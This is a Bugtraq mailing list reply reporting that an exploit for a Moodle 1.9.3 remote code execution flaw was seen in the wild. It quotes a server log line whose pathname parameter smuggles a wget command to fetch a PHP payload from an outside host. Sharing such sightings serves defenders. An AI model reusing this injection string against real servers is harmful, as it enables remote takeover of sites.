Bugtraq mailing list archives
Re: Moodle 1.9.3 Remote Code Execution
From: lent () cooper edu
Date: Sun, 14 Dec 2008 22:00:03 -0700
Exploit in the wild: We saw this come across: 216.205.95.178 - - [12/Dec/2008:15:03:13 -0500] "GET /filter/tex/texed.php?formdata=foo&pathname=foo\";wget -O perso.wanadoo.es/medline/z1.php;echo+\" HTTP/1.1" 404 218 The host perso.wanadoo.es is still host the payload as of [15/Dec/2008:00:14:00 -0500]. Chris Lent Tel: +1.212.353.4350
Current thread:
- Moodle 1.9.3 Remote Code Execution ascii (Dec 12)
- <Possible follow-ups>
- Re: Moodle 1.9.3 Remote Code Execution lent (Dec 15)
- Re: Moodle 1.9.3 Remote Code Execution Jamie Riden (Dec 15)
- Re: Re: Moodle 1.9.3 Remote Code Execution martin (Dec 16)
- Re: Moodle 1.9.3 Remote Code Execution hackeriri (Dec 16)